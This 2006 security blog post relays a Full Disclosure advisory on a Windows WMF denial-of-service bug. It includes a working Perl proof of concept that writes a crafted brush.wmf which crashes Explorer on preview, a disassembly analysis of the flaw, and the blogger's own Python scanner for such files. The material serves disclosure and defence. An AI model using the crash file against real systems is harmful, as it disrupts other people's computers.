
New 0-day WMF “Exploit”

August 6th, 2006

First off... you'll notice I put exploit in quotes... I haven't investigated this yet.... That's my plan for this evening... It's a crash which means a DoS.... whether you consider that an exploit or not is up to you...

Here's the original posting from FD

quote:
Posted by: cyanid-E
Description:

yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because of an invalid pointer access.
Incorrect (short) to (void*) sign extension also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E ";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
# 18-byte standard WMF header (mtSize = 0x22 words = 68 bytes), with "cyanid-E" in the unused fields
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
# CreateBrushIndirect (0x02FC), 7 words, BS_SOLID
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
# CreatePenIndirect (0x02FA), 8 words
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# CreateBrushIndirect, lbStyle 8 (BS_DIBPATTERN8X8), lbHatch 0x8000; then the META_EOF record
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait \n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).

Discovered:

06/24/2006; vendor informed but not answered

Further information from FD:

quote:
1. 'Bad' wmf record:

07 00 00 00

length of record (in words)

FC 02

type (CreateBrushIndirect)

08 00 00 00 00 00 00 80

'packed' (good old Win16 days) LOGBRUSH data:

08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)

2. Sign extension bug:

_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; < -- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......

3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; < -- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)


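As an added example (mine, not from the FD post or this blog), here is a small Python scanner that walks a WMF record stream the way the quoted write-up lays it out and flags any CreateBrushIndirect record whose packed LOGBRUSH uses a DIB-pattern style, which is the condition under which gdi32 dereferences the sign-extended 16-bit lbHatch word as a packed-DIB pointer. The record and LOGBRUSH layouts are taken from the write-up, BS_DIBPATTERNPT and BS_DIBPATTERN8X8 are the Windows brush-style constants it names, and the sample input is the brush.wmf the Perl script above emits; the benign control file is constructed here by switching that brush to BS_SOLID.

```python
import struct

META_EOF = 0x0000
META_CREATEBRUSHINDIRECT = 0x02FC
# LOGBRUSH styles for which gdi32 treats lbHatch as a pointer to a packed DIB
POINTER_BRUSH_STYLES = {6: "BS_DIBPATTERNPT", 8: "BS_DIBPATTERN8X8"}

# The 68-byte brush.wmf written by the quoted Perl script, transcribed from the post
POC_WMF = bytes.fromhex(
    "01000900 0003 22000000 6379 616e6964 2d45"  # 18-byte standard WMF header
    "07000000 fc02 0000 00000000 0000"           # CreateBrushIndirect, BS_SOLID
    "08000000 fa02 00000000 00000000 0000"       # CreatePenIndirect
    "07000000 fc02 0800 00000000 0080"           # CreateBrushIndirect, style 8, lbHatch 0x8000
    "03000000 0000"                              # META_EOF
)
# Constructed control: same file with the second brush changed to BS_SOLID (style 0)
BENIGN_WMF = POC_WMF[:54] + b"\x00" + POC_WMF[55:]

def wmf_records(data):
    """Yield (offset, function, params) for each record after the standard header."""
    hdr_words = struct.unpack_from("<H", data, 2)[0]  # mtHeaderSize, in words
    off = hdr_words * 2
    while off + 6 <= len(data):
        rec_words, func = struct.unpack_from("<IH", data, off)  # size in words, type
        rec_len = rec_words * 2
        if rec_words < 3 or off + rec_len > len(data):
            break  # malformed length field: stop instead of reading past the buffer
        yield off, func, data[off + 6:off + rec_len]
        if func == META_EOF:
            break
        off += rec_len

def sign_extend16(value):
    """Widen a 16-bit word as signed, the movsx the write-up flags on lbHatch."""
    return value - 0x10000 if value & 0x8000 else value

def find_pointer_brushes(data):
    """Report CreateBrushIndirect records whose packed LOGBRUSH makes the
    sign-extended lbHatch word be dereferenced as a packed-DIB pointer."""
    findings = []
    for off, func, params in wmf_records(data):
        if func != META_CREATEBRUSHINDIRECT or len(params) < 8:
            continue
        lb_style, _lb_color, lb_hatch = struct.unpack_from("<HIH", params, 0)
        if lb_style in POINTER_BRUSH_STYLES:
            findings.append({"offset": off, "style": POINTER_BRUSH_STYLES[lb_style],
                             "fake_pointer": sign_extend16(lb_hatch) & 0xFFFFFFFF})
    return findings
```

Running find_pointer_brushes(POC_WMF) reports the second brush at offset 48 with the 0x8000 hatch word widened to 0xFFFF8000, while the BS_SOLID control yields nothing.
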
I'll keep people informed as I play with it...

Peace,
HT